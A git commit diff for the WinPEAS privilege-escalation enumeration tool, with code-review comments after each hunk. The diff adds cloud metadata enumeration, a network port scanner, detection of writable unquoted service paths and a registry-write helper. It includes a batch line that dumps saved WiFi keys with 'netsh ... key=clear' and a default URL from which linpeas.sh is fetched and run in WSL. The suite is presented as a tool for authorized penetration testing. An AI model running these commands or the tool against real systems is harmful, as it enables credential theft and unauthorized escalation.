
WinPEASS Big Update

This commit is contained in:
Carlos Polop 2024-08-27 22:08:48 +02:00
parent c37db4654c
commit b435119723
36 changed files with 1727 additions and 729 deletions


@ -1,7 +1,7 @@
COPYING -- Describes the terms under which peass-ng is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
peass-ng is (C) 2006-2022 Carlos Polop Martin.
peass-ng is (C) 2019-2024 Carlos Polop Martin.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free


@ -38,6 +38,3 @@ If you want to **add something** and have **any cool idea** related to this proj
All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.
By Polop<sup>(TM)</sup>


@ -233,5 +233,3 @@ If you find any issue, please report it using **[github issues](https://github.c
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop<sup>(TM)</sup>


@ -23,5 +23,3 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop


@ -132,6 +132,3 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop<sup>(TM)</sup>


@ -4,7 +4,7 @@ COLOR 0F
CALL :SetOnce
REM :: WinPEAS - Windows local Privilege Escalation Awesome Script
REM :: Code by PEASS-ng; Re-Write by ThisLimn0
REM :: Code by carlospolop; Re-Write by ThisLimn0
REM Registry scan of other drives besides
REM /////true or false
@ -46,7 +46,7 @@ CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m
CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m"
CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m"
ECHO. by github.com/PEASS-ng
ECHO. by carlospolop
ECHO.
ECHO.
@ -363,7 +363,7 @@ CALL :T_Progress 1
:WifiCreds
CALL :ColorLine " %E%33m[+]%E%97m WIFI"
for /f "tokens=3,* delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%b key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.)
CALL :T_Progress 1
:BasicUserInfo


@ -178,6 +178,11 @@ Once you have installed and activated it you need to:
- [x] DNS Cache (limit 70)
- [x] Internet Settings
- **Cloud Metadata Enumeration**
- [x] AWS Metadata
- [x] GCP Metadata
- [x] Azure Metadata
- **Windows Credentials**
- [x] Windows Vault
- [x] Credential Manager
@ -256,6 +261,3 @@ If you find any issue, please report it using **[github issues](https://github.c
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop


@ -12,7 +12,7 @@ namespace winPEAS.Tests
try
{
string[] args = new string[] {
"systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "debug"
"systeminfo", "userinfo", "servicesinfo", "browserinfo", "eventsinfo", "cloud", "debug"
};
Program.Main(args);
}
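Review bot: The argument added to the test, `"cloud"`, does not match the key the new check is registered under — the same commit registers it as `new SystemCheck("cloudinfo", new CloudInfo())` in Checks.cs, and that file matches arguments by exact key (`systemCheckAllKeys.Contains(argToLower)`). As written the test most likely never exercises the cloud check at all; change the entry to `"cloudinfo"`. The enclosing test method starts and ends outside the hunk.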


@ -20,7 +20,7 @@ namespace winPEAS._3rdParty.Watson
{
{ 10240, "1507" }, { 10586, "1511" }, { 14393, "1607" }, { 15063, "1703" }, { 16299, "1709" },
{ 17134, "1803" }, { 17763, "1809" }, { 18362, "1903" }, { 18363, "1909" }, { 19041, "2004" },
{ 19042, "20H2" }
{ 19042, "20H2" }, { 22000, "21H2" }, { 22621, "22H2" }
};
// Get OS Build number
@ -30,7 +30,6 @@ namespace winPEAS._3rdParty.Watson
if (!supportedVersions.ContainsKey(buildNumber))
{
Console.Error.WriteLine($" [!] Windows version not supported, build number: '{buildNumber}'");
return;
}
var version = supportedVersions[buildNumber];
@ -39,7 +38,6 @@ namespace winPEAS._3rdParty.Watson
else
{
Console.Error.WriteLine(" [!] Could not retrieve Windows BuildNumber");
return;
}
// List of KBs installed
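Review bot: If `return;` is the line dropped from the unsupported-version branch (the hunk counts show exactly one deletion and no addition there), execution now falls through to `var version = supportedVersions[buildNumber];`, and the dictionary indexer throws `KeyNotFoundException` for any build not in the table — the added 21H2/22H2 entries narrow that window but do not close it for later builds. The same applies to the second hunk, where the "Could not retrieve Windows BuildNumber" branch no longer exits before the lookup. Either keep the early returns, or fold guard and lookup together: `if (!supportedVersions.TryGetValue(buildNumber, out var version)) { Console.Error.WriteLine(...); return; }`. The enclosing method continues outside both hunks.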


@ -117,6 +117,7 @@ namespace winPEAS.Checks
{ (app["Folder"].Length > 0) ? app["Folder"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "ouigyevb2uivydi2u3id2ddf3", !string.IsNullOrEmpty(app["interestingFolderRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["File"].Length > 0) ? app["File"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "adu8v298hfubibuidiy2422r", !string.IsNullOrEmpty(app["interestingFileRights"]) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ (app["Reg"].Length > 0) ? app["Reg"].Replace("\\", "\\\\").Replace("(", "\\(").Replace(")", "\\)").Replace("]", "\\]").Replace("[", "\\[").Replace("?", "\\?").Replace("+","\\+") : "o8a7eduia37ibduaunbf7a4g7ukdhk4ua", (app["RegPermissions"].Length > 0) ? Beaprint.ansi_color_bad : Beaprint.ansi_color_good },
{ "Potentially sensitive file content:", Beaprint.ansi_color_bad },
};
string line = "";
@ -158,9 +159,9 @@ namespace winPEAS.Checks
line += "\n File: " + filepath_mod;
}
if (app["isUnquotedSpaced"].ToLower() == "true")
if (app["isUnquotedSpaced"].ToLower() != "false")
{
line += " (Unquoted and Space detected)";
line += $" (Unquoted and Space detected) - {app["isUnquotedSpaced"]}";
}
if (!string.IsNullOrEmpty(app["interestingFileRights"]))
@ -168,6 +169,11 @@ namespace winPEAS.Checks
line += "\n FilePerms: " + app["interestingFileRights"];
}
if (app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"]))
{
line += "\n Potentially sensitive file content: " + app["sensitiveInfoList"];
}
Beaprint.AnsiPrint(line, colorsA);
Beaprint.PrintLineSeparator();
}
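Review bot: `app["isUnquotedSpaced"].ToLower() != "false"` is a culture-sensitive comparison on a value that this commit now sets to either the literal `"false"` or a comma-joined path list; prefer `!string.Equals(app["isUnquotedSpaced"], "false", StringComparison.OrdinalIgnoreCase)` so the branch cannot depend on the thread culture. In the last hunk, `app.ContainsKey("sensitiveInfoList") && !string.IsNullOrEmpty(app["sensitiveInfoList"])` performs two lookups where `app.TryGetValue("sensitiveInfoList", out var sensitive) && !string.IsNullOrEmpty(sensitive)` performs one. The enclosing loop body starts outside the hunks.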


@ -3,12 +3,14 @@ using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
using System.Net;
using System.Security.Principal;
using winPEAS.Helpers;
using winPEAS.Helpers.AppLocker;
using winPEAS.Helpers.Registry;
using winPEAS.Helpers.Search;
using winPEAS.Helpers.YamlConfig;
using winPEAS.Info.NetworkInfo.NetworkScanner;
using winPEAS.Info.UserInfo;
namespace winPEAS.Checks
@ -21,8 +23,12 @@ namespace winPEAS.Checks
public static bool IsDebug = false;
public static bool IsLinpeas = false;
public static bool IsLolbas = false;
public static bool IsNetworkScan = false;
public static bool SearchProgramFiles = false;
private static IEnumerable<int> PortScannerPorts = null;
private static string NetworkScanOptions = string.Empty;
// Create Dynamic blacklists
public static readonly string CurrentUserName = Environment.UserName;
public static string CurrentUserDomainName = Environment.UserDomainName;
@ -47,7 +53,7 @@ namespace winPEAS.Checks
private static readonly HashSet<string> _systemCheckSelectedKeysHashSet = new HashSet<string>();
// github url for Linpeas.sh
public static string LinpeasUrl = "https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh";
public static string LinpeasUrl = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh";
public const string DefaultLogFile = "out.txt";
@ -87,7 +93,8 @@ namespace winPEAS.Checks
new SystemCheck("windowscreds", new WindowsCreds()),
new SystemCheck("browserinfo", new BrowserInfo()),
new SystemCheck("filesinfo", new FilesInfo()),
new SystemCheck("fileanalysis", new FileAnalysis())
new SystemCheck("fileanalysis", new FileAnalysis()),
new SystemCheck("cloudinfo", new CloudInfo())
};
var systemCheckAllKeys = new HashSet<string>(_systemChecks.Select(i => i.Key));
@ -199,6 +206,52 @@ namespace winPEAS.Checks
}
}
if (arg.StartsWith("-network", StringComparison.CurrentCultureIgnoreCase))
{
/*
-network="auto" - find interfaces/hosts automatically
-network="10.10.10.10,10.10.10.20" - scan only selected ip address(es)
-network="10.10.10.10/24" - scan host based on ip address/netmask
*/
if (!IsNetworkTypeValid(arg))
{
Beaprint.ColorPrint($" [!] the \"-network\" argument is invalid. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
var parts = arg.Split('=');
string networkType = parts[1];
IsNetworkScan = true;
NetworkScanOptions = networkType;
}
if (arg.StartsWith("-ports", StringComparison.CurrentCultureIgnoreCase))
{
// e.g. -ports="80,443,8080"
var parts = arg.Split('=');
if (!IsNetworkScan || parts.Length != 2 || string.IsNullOrEmpty(parts[1]))
{
Beaprint.ColorPrint($" [!] the \"-network\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
var portString = parts[1];
IEnumerable<int> ports = new List<int>();
try
{
PortScannerPorts = portString.Trim('"').Trim('\'').Split(',').ToList().ConvertAll<int>(int.Parse);
}
catch (Exception)
{
Beaprint.ColorPrint($" [!] the \"-ports\" argument is not present or valid, add it if you want to define network scan ports. For help, run winpeass.exe --help", Beaprint.YELLOW);
return;
}
}
string argToLower = arg.ToLower();
if (systemCheckAllKeys.Contains(argToLower))
{
@ -237,7 +290,7 @@ namespace winPEAS.Checks
CheckRunner.Run(() => CreateDynamicLists(isFileSearchEnabled), IsDebug);
RunChecks(isAllChecks, wait);
RunChecks(isAllChecks, wait, IsNetworkScan);
SearchHelper.CleanLists();
@ -258,7 +311,58 @@ namespace winPEAS.Checks
}
}
private static void RunChecks(bool isAllChecks, bool wait)
private static bool IsNetworkTypeValid(string arg)
{
var parts = arg.Split('=');
string networkType = string.Empty;
if (parts.Length == 2 && !string.IsNullOrEmpty(parts[1]))
{
networkType = parts[1];
// auto
if (string.Equals(networkType, "auto", StringComparison.InvariantCultureIgnoreCase))
{
return true;
}
// netmask e.g. 10.10.10.10/24
else if (networkType.Contains("/"))
{
var rangeParts = networkType.Split('/');
if (rangeParts.Length == 2 && int.TryParse(rangeParts[1], out int res) && res <= 32 && res >= 0)
{
return true;
}
}
// list of ip addresses
else if (networkType.Contains(","))
{
var ips = networkType.Split(',');
try
{
var validIpsCount = ips.ToList().ConvertAll<IPAddress>(IPAddress.Parse).Count();
}
catch (Exception)
{
return false;
}
return true;
}
// single ip
else if (IPAddress.TryParse(networkType, out _))
{
return true;
}
}
return false;
}
private static void RunChecks(bool isAllChecks, bool wait, bool isNetworkScan)
{
for (int i = 0; i < _systemChecks.Count; i++)
{
@ -274,6 +378,12 @@ namespace winPEAS.Checks
}
}
}
if (isNetworkScan)
{
NetworkScanner scanner = new NetworkScanner(NetworkScanOptions, PortScannerPorts);
scanner.Scan();
}
}
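Review bot: `IsNetworkTypeValid` accepts a CIDR argument without validating the address half — only the prefix length is checked — so a value whose left side is not an IP address passes and reaches `NetworkScanner` unvalidated; add the address check to the condition: `if (rangeParts.Length == 2 && IPAddress.TryParse(rangeParts[0], out _) && int.TryParse(rangeParts[1], out int res) && res >= 0 && res <= 32)`. The `-ports` branch is order-dependent (it rejects `-ports` whenever `-network` has not already been processed, so the two flags only work in one order) and `int.Parse` accepts values outside 1–65535, which `PortScannerPorts.All(p => p >= 1 && p <= 65535)` would catch before the scanner sees them. The `catch (Exception)` around `int.Parse` can be narrowed to `FormatException`/`OverflowException`, and the locals `IEnumerable<int> ports` and `validIpsCount` are never read. The argument loop these hunks belong to starts outside the hunk.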
private static void CreateDynamicLists(bool isFileSearchEnabled)


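--- /dev/null
+++ b/UNKNOWN-PATH/CloudInfo.cs
@@ -0,0 +1,93 @@
+using System.Collections.Generic;
+using winPEAS.Helpers;
+using winPEAS.Info.CloudInfo;
+namespace winPEAS.Checks
+{
+internal class CloudInfo : ISystemCheck
+{
+public void PrintInfo(bool isDebug)
+{
+Beaprint.GreatPrint("Cloud Information");
+var cloudInfoList = new List<CloudInfoBase>
+{
+new AWSInfo(),
+new AzureInfo(),
+new GCPInfo()
+};
+foreach (var cloudInfo in cloudInfoList)
+{
+string isCloud = cloudInfo.IsCloud ? "Yes" : "No";
+string line = string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}");
+Dictionary<string, string> colorsMS = new Dictionary<string, string>()
+{
+{ "Yes", Beaprint.ansi_color_bad },
+};
+Beaprint.AnsiPrint(line, colorsMS);
+}
+foreach (var cloudInfo in cloudInfoList)
+{
+if (cloudInfo.IsCloud)
+{
+Beaprint.MainPrint(cloudInfo.Name + " Enumeration");
+if (cloudInfo.IsAvailable)
+{
+foreach (var kvp in cloudInfo.EndpointDataList())
+{
+// key = "section", e.g. User, Network, ...
+string section = kvp.Key;
+var endpointDataList = kvp.Value;
+Beaprint.ColorPrint(section, Beaprint.ansi_color_good);
+foreach (var endpointData in endpointDataList)
+{
+var colors = new Dictionary<string, string>
+{
+{ endpointData.EndpointName, Beaprint.GRAY }
+};
+string message;
+if (!string.IsNullOrEmpty(endpointData.Data))
+{
+message = endpointData.Data;
+// if it is a JSON data, add additional newline so it's displayed on a separate line
+if (message.StartsWith("{"))
+{
+message = $"\n{message}\n";
+}
+if (endpointData.IsAttackVector)
+{
+colors.Add(message, Beaprint.ansi_color_bad);
+}
+else
+{
+colors.Add(message, Beaprint.ansi_color_gray);
+}
+}
+else
+{
+message = "No data received from the metadata endpoint";
+}
+Beaprint.ColorPrint($"{endpointData.EndpointName,-30}{message}", Beaprint.ansi_color_gray);
+}
+Beaprint.GrayPrint("");
+}
+}
+else
+{
+Beaprint.NoColorPrint("Could not connect to the metadata endpoint");
+}
+}
+}
+}
+}
+}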
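Review bot: `string.Format($"{cloudInfo.Name + "?",-40}{isCloud,-5}")` hands an already-interpolated string to `string.Format` as a format string; the call is redundant and any `{` or `}` in a provider name would raise `FormatException`. Use the interpolated string directly: `string line = $"{cloudInfo.Name + "?",-40}{isCloud,-5}";`. `colorsMS` is identical on every iteration and can be built once before the first `foreach`. A `<summary>` on `PrintInfo` saying that it first prints a detection table for every `CloudInfoBase` and then enumerates metadata endpoints only for providers reporting both `IsCloud` and `IsAvailable` would tell a reader why the list is walked twice.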


@ -1,4 +1,4 @@
using System;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
@ -97,9 +97,19 @@ namespace winPEAS.Checks
else
{
foreach (var fold in file.FullPath.Split('\\').Skip(1))
{
isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase);
if (isFileFound) break;
{
try
{
isFileFound = Regex.IsMatch(fold, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
if (isFileFound) break;
}
catch (RegexMatchTimeoutException e)
{
if (Checks.IsDebug)
{
Beaprint.GrayPrint($"The file in folder regex {pattern} had a timeout in {fold} (ReDoS avoided but regex unchecked in a file)");
}
}
}
}
}
@ -111,7 +121,17 @@ namespace winPEAS.Checks
}
else
{
isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase);
try
{
isFileFound = Regex.IsMatch(file.Filename, pattern, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(20));
}
catch (RegexMatchTimeoutException e)
{
if (Checks.IsDebug)
{
Beaprint.GrayPrint($"The file regex {pattern} had a timeout in {file.Filename} (ReDoS avoided but regex unchecked in a file)");
}
}
}
}
@ -148,7 +168,7 @@ namespace winPEAS.Checks
return new bool[] { false, somethingFound };
}
private static List<string> SearchContent(string text, string regex_str, bool caseinsensitive)
public static List<string> SearchContent(string text, string regex_str, bool caseinsensitive)
{
List<string> foundMatches = new List<string>();
@ -157,17 +177,20 @@ namespace winPEAS.Checks
Regex rgx;
bool is_re_match = false;
try
{
{
// Escape backslashes in the regex string
string escapedRegex = regex_str.Trim().Replace(@"\", @"\\");
// Use "IsMatch" because it supports timeout, if exception is thrown exit the func to avoid ReDoS in "rgx.Matches"
if (caseinsensitive)
{
is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
rgx = new Regex(regex_str.Trim(), RegexOptions.IgnoreCase);
is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.IgnoreCase, TimeSpan.FromSeconds(120));
rgx = new Regex(escapedRegex, RegexOptions.IgnoreCase);
}
else
{
is_re_match = Regex.IsMatch(text, regex_str.Trim(), RegexOptions.None, TimeSpan.FromSeconds(120));
rgx = new Regex(regex_str.Trim());
is_re_match = Regex.IsMatch(text, escapedRegex, RegexOptions.None, TimeSpan.FromSeconds(120));
rgx = new Regex(escapedRegex);
}
}
catch (RegexMatchTimeoutException e)
@ -200,8 +223,6 @@ namespace winPEAS.Checks
Beaprint.GrayPrint($"Error looking for regex {regex_str} inside files: {e}");
}
//}
return foundMatches;
}
@ -444,7 +465,7 @@ namespace winPEAS.Checks
foundRegexes[regex_obj.name][regex.name] = fileResults;
}
}
catch (Exception ex)
catch (System.IO.IOException)
{
// Cannot read the file
}
@ -454,8 +475,8 @@ namespace winPEAS.Checks
timer.Stop();
TimeSpan timeTaken = timer.Elapsed;
if (timeTaken.TotalMilliseconds > 20000)
Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
if (timeTaken.TotalMilliseconds > 10000)
Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}ms in {f.FullPath}");
}
}
}
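Review bot: `regex_str.Trim().Replace(@"\", @"\\")` doubles every backslash before the pattern is compiled, which turns regex escapes such as `\d`, `\s` or `\.` into a literal backslash followed by the letter — any configured pattern that relies on them silently stops matching. If the intent is a literal search, `Regex.Escape(regex_str.Trim())` is the correct call; if the configured values are real regexes, the replacement should be dropped. Separately, narrowing the catch in the last hunk to `System.IO.IOException` lets `UnauthorizedAccessException` (not an `IOException` subclass) escape from files the current user cannot read, which the previous `catch (Exception)` absorbed; `catch (Exception ex) when (ex is IOException || ex is UnauthorizedAccessException)` keeps the intent while staying narrow. The `e` variables in the two new `RegexMatchTimeoutException` handlers are unused. `SearchContent` and the methods around the other hunks continue outside the hunks.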


@ -290,15 +290,13 @@ namespace winPEAS.Checks
const string distribution = "Distribution";
const string rootDirectory = "Root directory";
const string runWith = "Run command";
const string wslUser = "WSL user";
const string root = "root";
var colors = new Dictionary<string, string>();
new List<string>
{
linpeas,
distribution,
rootDirectory,
runWith
}.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
new List<string> { linpeas, distribution, rootDirectory, runWith, wslUser, root }
.ForEach(str => colors.Add(str, Beaprint.ansi_color_bad));
Beaprint.BadPrint(" Found installed WSL distribution(s) - listed below");
Beaprint.AnsiPrint($" Run {linpeas} in your WSL distribution(s) home folder(s).\n", colors);
@ -310,14 +308,16 @@ namespace winPEAS.Checks
string distributionSubKey = $"{basePath}\\{wslKey}";
string distributionRootDirectory = $"{RegistryHelper.GetRegValue(hive, distributionSubKey, "BasePath")}\\rootfs";
string distributionName = RegistryHelper.GetRegValue(hive, distributionSubKey, "DistributionName");
string user = WSLHelper.TryGetRootUser(distributionName, wslKey);
Beaprint.AnsiPrint($" {distribution}: \"{distributionName}\"\n" +
$" {wslUser}: \"{user}\"\n" +
$" {rootDirectory}: \"{distributionRootDirectory}\"\n" +
$" {runWith}: wsl.exe --distribution \"{distributionName}\"",
colors);
Beaprint.PrintLineSeparator();
}
catch (Exception) { }
catch (Exception ex) { }
}
// try to run linpeas.sh in the default distribution
@ -328,7 +328,7 @@ namespace winPEAS.Checks
{
try
{
WSL.RunLinpeas(Checks.LinpeasUrl);
WSLHelper.RunLinpeas(Checks.LinpeasUrl);
}
catch (Exception ex)
{
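Review bot: `catch (Exception ex) { }` adds an unused variable (warning CS0168) while still swallowing every exception from the per-distribution block; either report it in debug mode — `catch (Exception ex) { if (Checks.IsDebug) { Beaprint.PrintException(ex.Message); } }` — or keep the previous `catch (Exception)`. The new color key `root` is the bare word; if `AnsiPrint` highlights every occurrence of a key, it will also color `root` inside `rootfs` in the printed root-directory path — worth confirming against `AnsiPrint`. The enclosing method starts and ends outside the hunks.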


@ -36,11 +36,14 @@ namespace winPEAS.Checks
{ "Possible DLL Hijacking.*", Beaprint.ansi_color_bad },
};
if (DefensiveProcesses.Definitions.ContainsKey(procInfo["Name"]))
// we need to find first occurrence of the procinfo name
string processNameSanitized = procInfo["Name"].Trim().ToLower();
if (DefensiveProcesses.AVVendorsByProcess.ContainsKey(processNameSanitized))
{
if (!string.IsNullOrEmpty(DefensiveProcesses.Definitions[procInfo["Name"]]))
if (DefensiveProcesses.AVVendorsByProcess[processNameSanitized].Count > 0)
{
procInfo["Product"] = DefensiveProcesses.Definitions[procInfo["Name"]];
procInfo["Product"] = string.Join(", ", DefensiveProcesses.AVVendorsByProcess[processNameSanitized]);
}
colorsP[procInfo["Product"]] = Beaprint.ansi_color_good;
}
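Review bot: `procInfo["Name"].Trim().ToLower()` is culture-sensitive; because the result is used as a dictionary key, use `ToLowerInvariant()` (or build `AVVendorsByProcess` with `StringComparer.OrdinalIgnoreCase`) so the lookup behaves the same under every locale. The `ContainsKey` followed by two indexer reads collapses to a single lookup: `if (DefensiveProcesses.AVVendorsByProcess.TryGetValue(processNameSanitized, out var vendors)) { if (vendors.Count > 0) { procInfo["Product"] = string.Join(", ", vendors); } ... }`. The enclosing method starts and ends outside the hunk.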


@ -387,8 +387,7 @@ namespace winPEAS.Checks
static void PrintCachedCreds()
{
try
{
try{
Beaprint.MainPrint("Cached Creds");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user");
string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT");


@ -81,6 +81,7 @@ namespace winPEAS.Helpers
/---------------------------------------------------------------------------------\
| {1}Do you like PEASS?{0} |
|---------------------------------------------------------------------------------|
| {3}Get the latest version{0} : {2}https://github.com/sponsors/carlospolop{0} |
| {3}Follow on Twitter{0} : {2}@hacktricks_live{0} |
| {3}Respect on HTB{0} : {2}SirBroccoli {0} |
|---------------------------------------------------------------------------------|
@ -132,6 +133,7 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR);
Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR);
Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR);
Console.WriteLine(LCYAN + " cloudinfo" + GRAY + " Enumerate cloud information" + NOCOLOR);
Console.WriteLine();
Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR);
Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR);
@ -146,6 +148,11 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR);
Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" +
$" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR);
Console.WriteLine(LCYAN + " -network" + GRAY + $" Run additional network scanning - find network interfaces, hosts and scan nmap top 1000 TCP ports for each host found\n" +
$" -network=\"auto\" - find interfaces/hosts automatically" + NOCOLOR + "\n" +
$" -network=\"10.10.10.10,10.10.10.20\" - scan only selected ip address(es)" + NOCOLOR + "\n" +
$" -network=\"10.10.10.10/24\" - scan host based on ip address/netmask" + NOCOLOR + "\n" +
$" -ports=\"80,443,8080\" - If a list of ports is provided, use this list instead of the nmap top 1000 TCP" + NOCOLOR);
}
@ -290,8 +297,7 @@ namespace winPEAS.Helpers
string value = entry.Value;
string key = entry.Key;
string line = "";
string line;
if (!no_gray)
{
line = ansi_color_gray + " " + key + ": " + NOCOLOR + value;
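Review bot: The new `-network` help text does not say that `-ports` must come after `-network` on the command line, yet the argument parser in Checks.cs on this same commit rejects `-ports` whenever `-network` has not already been processed; add a line such as `-ports must be given after -network` to the help block, or make the parser order-independent and leave the text as is. The banner row labelled `Get the latest version` links to a sponsors page; if that is intended, a label like `Sponsor the project` would describe the link accurately. Both enclosing methods start and end outside the hunks.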


@ -122,6 +122,51 @@ namespace winPEAS.Helpers
return binaryPath;
}
public static bool CheckQuoteAndSpaceWithPermissions(string path, out List<string> injectablePaths)
{
List<string> result = new List<string>();
bool isInjectable = false;
if (!path.Contains('"') && !path.Contains("'"))
{
if (path.Contains(" "))
{
string currentPath = string.Empty;
foreach (var pathPart in Regex.Split(path, @"\s"))
{
currentPath += pathPart + " ";
if (File.Exists(currentPath) || Directory.Exists(currentPath))
{
var permissions = PermissionsHelper.GetPermissionsFolder(currentPath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
if (permissions.Any())
{
result.Add(currentPath);
isInjectable = true;
}
}
else
{
var firstPathPart = currentPath;
DirectoryInfo di = new DirectoryInfo(firstPathPart);
var exploitablePath = di.Parent.FullName;
var folderPermissions = PermissionsHelper.GetPermissionsFolder(exploitablePath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
if (folderPermissions.Any())
{
result.Add(exploitablePath);
isInjectable = true;
};
}
}
}
}
injectablePaths = result.Select(i => i).Distinct().ToList();
return isInjectable;
}
public static bool CheckQuoteAndSpace(string path)
{
if (!path.Contains('"') && !path.Contains("'"))
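Review bot: `di.Parent.FullName` dereferences `Parent` without a null check; `DirectoryInfo.Parent` is null for a drive root, so a path whose first whitespace-separated prefix resolves to a root throws `NullReferenceException` out of `CheckQuoteAndSpaceWithPermissions`, which has no handler of its own. Guard it: `var parentDir = di.Parent; if (parentDir == null) { continue; } var exploitablePath = parentDir.FullName;`. Smaller points in the same hunk: `result.Select(i => i).Distinct().ToList()` contains a no-op `Select`, and the `};` after the inner `if` leaves a stray empty statement. A `<summary>` stating that the method returns true when the unquoted, space-containing path has a writable prefix directory and reports those prefixes through `injectablePaths` would document the contract callers in ApplicationInfo now rely on.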


@ -24,6 +24,40 @@ namespace winPEAS.Helpers.Registry
return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
}
public static bool WriteRegValue(string hive, string path, string keyName, string value)
{
try
{
RegistryKey regKey;
if (hive == "HKCU")
{
regKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(path);
}
else if (hive == "HKU")
{
regKey = Microsoft.Win32.Registry.Users.OpenSubKey(path);
}
else
{
regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
}
if (regKey == null)
{
return false;
}
regKey.SetValue(keyName, value, RegistryValueKind.String);
}
catch (Exception ex)
{
return false;
}
return true;
}
public static string GetRegValue(string hive, string path, string value)
{
// returns a single registry value under the specified path in the specified hive (HKLM/HKCU)
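Review bot: `WriteRegValue` opens every hive with the single-argument `OpenSubKey(path)`, which returns a read-only handle; `SetValue` on it throws `UnauthorizedAccessException`, the catch turns that into `return false`, so the method cannot succeed as written. Open the key with `OpenSubKey(path, writable: true)` in all three branches, and dispose the handle — `using (regKey) { regKey.SetValue(keyName, value, RegistryValueKind.String); }`. `ex` in the catch is unused; drop it or surface it under `Checks.Checks.IsDebug` so a silent `false` can be diagnosed.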


@ -5,8 +5,10 @@ using System.IO;
using System.Linq;
using System.Management;
using System.Text.RegularExpressions;
using winPEAS.Checks;
using winPEAS.Helpers;
using winPEAS.Helpers.Registry;
using winPEAS.Helpers.YamlConfig;
namespace winPEAS.Info.ApplicationInfo
{
@ -256,6 +258,9 @@ namespace winPEAS.Info.ApplicationInfo
{
}
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
results.Add(new Dictionary<string, string>()
{
{"Reg", autorunLocation[0] + "\\" + autorunLocation[1]},
@ -274,7 +279,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
